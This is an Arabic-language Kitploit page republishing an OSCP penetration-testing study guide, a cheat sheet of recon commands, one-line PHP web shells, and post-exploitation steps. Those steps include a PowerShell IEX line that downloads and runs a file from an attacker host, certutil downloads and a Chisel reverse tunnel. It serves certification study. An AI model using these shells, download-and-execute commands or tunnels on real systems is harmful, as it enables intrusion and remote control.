Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OSCP — OSCP Study Guide | Kitploit
أدوات/GitHubGitHub/rootsecdev/oscp
ReconnaissanceExploitationWeb Application ExploitationPost-ExploitationWeb SecurityNetwork SecurityPenetration TestingLearning & EducationRed Teaming
GitHubrootsecdev/oscp

OSCP

OSCP Study Guide

425منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

OSCP

دليل دراسة OSCP

الفهرس

التعداد والاستطلاع

تعداد الويب

فحص Nikto:

root@kitploit:~
nikto -h http://10.10.10.1

اكتشاف الدلائل باستخدام أدوات مختلفة:

DIRB

root@kitploit:~
dirb http://10.10.10.1

Gobuster

root@kitploit:~
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

اختبار اختراق تطبيقات الويب

حمولات XSS: المرجع السريع: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

اختبار نموذج XSS الأساسي باستخدام مستمع netcat أو خادم ويب بايثون

root@kitploit:~

البرمجة النصية عبر المواقع لتفريغ ملفات تعريف الارتباط بترميز base64. تأكد من ترميز العنوان URL في Burp باستخدام ctrl + u

root@kitploit:~

قشور الويب

المرجع: https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html

قشرة ويب PHP بسيطة لتنفيذ الأوامر

root@kitploit:~
<?php system($_REQUEST ['cmd']) ?>
root@kitploit:~
<?php system($_GET['cmd']); ?>

اختبار اختراق SNMP

المنفذ 161 UDP

root@kitploit:~
snmpwalk -c public -v2c 10.129.213.210
root@kitploit:~
snmp-check 10.129.213.210

اختبار اختراق SMB

root@kitploit:~
crackmapexec smb 10.129.70.254 

اكتشاف المشاركات المجهولة المفتوحة

root@kitploit:~
smbclient -L //10.129.70.254

المصادقة الفارغة

root@kitploit:~
smbclient -N -L //10.129.70.254

ما بعد الاستغلال

تنزيل ونقل الملفات

Certutil:

root@kitploit:~
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

PowerShell:

root@kitploit:~
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
root@kitploit:~
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"

إعادة توجيه المنافذ والأنفاق

باستخدام Chisel:

مثال باستخدام إعادة توجيه المنافذ لجعل المنفذ 910 متاحًا على جهاز Kali

root@kitploit:~
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
root@kitploit:~
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse
تنزيل الأداة